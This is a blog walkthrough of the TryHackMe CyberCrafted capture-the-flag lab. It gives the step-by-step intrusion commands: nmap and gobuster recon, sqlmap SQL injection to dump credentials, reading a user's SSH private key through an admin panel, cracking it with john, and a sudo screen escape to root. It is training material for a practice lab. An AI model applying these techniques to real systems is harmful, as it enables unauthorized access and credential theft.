Try Hack Me CyberCrafted
@ Animesh Roy | Wednesday, Nov 24, 2021 | 2 minutes read | Update at Wednesday, Nov 24, 2021

OverView

Pwn this pay-to-win Minecraft server!

CyberCraftedlogo
CyberCrafted [Free Room]CyberCrafted

Task 01: Deploy the machine

Task 02: Root it

Answer the questions below

TaskQuestionAns
1How many ports are open?2.1
2What service runs on the highest port?2.2
3Any subdomains? (Alphabetical order)2.3
4On what page did you find the vulnerability?2.4
5What is the admin’s username? (Case-sensitive)2.5
6What is the web flag?2.6
7Can you get the Minecraft server flag?2.7
8What is the name of the sketchy plugin?2.8
9What is the user’s flag?2.9
10Finish the job and give me the root flag!2.10

Initial recon

nmap

basic nmap returns 2 open ports

  • Virtual Hosting:

    curl -I 10.10.204.106                                                                
HTTP/1.1 302 Found
Date: Wed, 24 Nov 2021 10:45:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: http://cybercrafted.thm/
Content-Type: text/html; charset=UTF-8

  • curl returns a domain name, let’s add that to our /etc/hosts file.

SqlMap

  • capture the req for http://store.cybercrafted.thm/search.php using burp and save it as search.req
  • run it through sqlmap -r search.req
  • command: sqlmap -r search.req --dbs

login to admin portal

  • we got creds from sqlmap
  • you can find the plain text password of hash on crackstation.net

ssh-key

  • once you save the key
  • use ssh2john to generate the crackable hash; locate ssh2john to find the file on your attacker machine
  • usr/share/john/ssh2john.py creeper.key > cracking.hash
  • cracking: john cracking.hash --wordlist=/usr/share/wordlists/rockyou.txt

Flags

2.1

ref to nmap

2.2

ref to nmap

or

nmap -sC -sV IP:HigherPort(open)

2.3

  • Wordlist : SecLists
  • commaand: gobuster vhost -u domain.thm -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

2.4

  • initial enum shows web-service running php
  • let’s run gobuster
  • command: gobuster dir -u http://store.cybercrafted.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o store.out -x php

2.5

ref to Sqlmap

2.6

ref to Sqlmap

2.7

  • once you login to admin panel
  • you can download the .ssh keys for xXUltimateCreeperXx
  • on http://admin.cybercrafted.thm/panel.php run this cat /home/xxultimatecreeperxx/.ssh/id_rsa
  • save the key
  • ref to ssh-key
  • login as xxultimatecreeperxx
  • find mindcraft dir
  • find command find / -name 'minecraft' 2>/dev/null
  • you’ll see the flag on the directory

2.8

  • list the plugins ls /opt/minecraft/cybercrafted/plugins/

2.9

  • goto sketchy plugin directory
  • you’ll see the creds on log.txt
  • use that to elevate to cybercrafted
  • read the user flag.

2.10

  • check with sudo -l

    cybercrafted@cybercrafted:~$ sudo -l 
Matching Defaults entries for cybercrafted on cybercrafted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
(root) /usr/bin/screen -r cybercrafted

  • check gtfobins for screen

  • run the sudo command then type CTRL+A & c to get the shell.

  • read the root flag.

© 2010 - 2024 Classroom

Reading Stuffs

Social Links

YOU CAN REUSE MY CONTENT